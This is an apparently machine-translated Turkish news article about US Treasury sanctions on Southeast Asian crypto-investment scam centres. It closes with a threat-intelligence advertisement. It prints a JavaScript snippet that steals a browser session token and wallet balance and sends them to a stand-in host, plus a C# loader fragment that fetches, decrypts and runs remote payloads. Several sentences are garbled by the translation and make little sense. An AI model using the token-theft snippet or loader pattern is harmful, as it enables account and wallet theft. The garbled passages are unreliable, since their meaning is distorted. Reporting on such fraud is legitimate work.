ABD Hazine Bakanlığı, 2024’te Amerikan kurbanlarından toplu olarak on milyar dolardan fazla çalan Güneydoğu Asya’daki bir siber dolandırıcılık merkezleri ağına karşı kapsamlı bir yaptırım kampanyası açtı.
Genellikle meşru sanal para yatırım platformları olarak görünen bu operasyonlar, kullanıcıları kablo fonlarına koakste etmek için sofistike sosyal mühendislik tekniklerine dayanıyordu, ancak güven kurulduktan sonra mevduattan kaçmak için.
İnsan haklarını çiğnemeden zorla çalıştırmadan zorlu operatörler için yüksek basınçlı kotalar dağıtmaya kadar, ağın erişimi Myanmar’daki izole bileşiklerden casino tatil köylerine kadar genişledi.
Pandeminin ilk aylarında ciddiyetle ortaya çıkan bu “domuz kasap” dolandırıcıları, güvenilir bir getiri yanılsaması oluşturmak için romantizm sahtekarlığının unsurlarını, mobil mesajlaşma istismarlarını ve hileli blockchain öğreticilerini birleştirdi.
Sanal para yatırım web siteleri, gerçek zamanlı fiyat yemleri, SSL sertifikaları ve saygın borsaları taklit eden kullanıcı gösterge tabloları ile sağlandı.
Genellikle zorla işe alınan operatörlerin iş istasyonlarına yüklenen arka uç kötü amaçlı yazılım kitleri, ödeme bildirimlerinin ve sosyal hesap devralmalarının otomatik olarak sahtekarlık yapmasını kolaylaştırır.
ABD Hazine analistleri, SMS’yi tek seferlik kazançları kesen ve sentetik işlem onaylarını enjekte eden kod modüllerini belirledi ve dolandırıcıların endişe verici güvenilirlikle iki faktörlü kimlik doğrulamasını atlamalarını sağladı.
Bu merkezler ölçeklendikçe, bazıları borç esaret tehdidi altında tutulan kaçakçılı bireyler, perdeleri kişiselleştirmek için açık kaynaklı zekadan yararlanan senaryo diyalogları aracılığıyla arayanları çalıştırmak için eğitildi.
Kurbanlardan, “cüzdan bağlantısını doğrulamak” için tarayıcılarında iyi huylu görünümlü JavaScript snippet’lerini çalıştırmaları istendi ve bilmeden aldatmaca operatörlerine yerel oturum depolamalarına erişim sağladı.
Hazine soruşturmaları sırasında kurtarılan bu kötü amaçlı senaryoların bir örneği, oturum belirteçlerinin nasıl hasat edildiğini göstermektedir:-
(async () => {
const token = localStorage.getItem('auth_token');
await fetch('https://malicious.scam/api/steal', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ token, balance: window.wallet.balance })
});
})();ABD Hazine analistleri, bu snippet’in JSON-RPC arayüzleri aracılığıyla uzaktan komut dosyası enjeksiyonuna izin veren tarayıcı uzantılarından yararlanarak ortak içerik güvenliği politikası (CSP) kısıtlamalarını atladığını belirtti.
Kalıcılık taktikleri
Yatai New City olarak bilinen Burma tabanlı merkezin kalbinde, operatörler, tehlikeye atılan hesaplar ve iç iş istasyonları üzerinde sürekli kontrolü sürdürmek için özel kalıcılık mekanizmaları kullandılar.
“Beaconyatai” olarak adlandırılan hafif bir C# yükleyici, dirençli komut ve kontrol kanalları oluşturmak için meşru video konferans araçlarına gömüldü.
Kurulduktan sonra Beaconyatai, kendisini otomatik olarak boot’da yeniden başlatan “SVCupdate” adlı bir Windows hizmeti olarak kaydetti.
Hizmet, şifreli görev yüklerini almak için telgraf API’sında gizlenmiş bir uç noktayı periyodik olarak yok etti ve bunları sert kodlu bir RSA anahtarı kullanarak şifresini çözdü:-
RSAParameters rsaKey = LoadKey("-----BEGIN RSA PRIVATE KEY-----...");
byte[] payload = FetchFromTelegram().Decrypt(rsaKey);
ExecutePayload(payload);.webp)
Sosyal baskı, gelişmiş komut dosyası istismarları ve özel kötü amaçlı yazılım kalıcılığı iç içe geçirerek, bu aldatmaca merkezleri yüksek operasyonel çalışma süresine ulaştı ve Hazine’nin yaptırımlarını multimilyon dolarlık bir ceza işletmesini sökmek için kritik bir adım haline getirdi.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.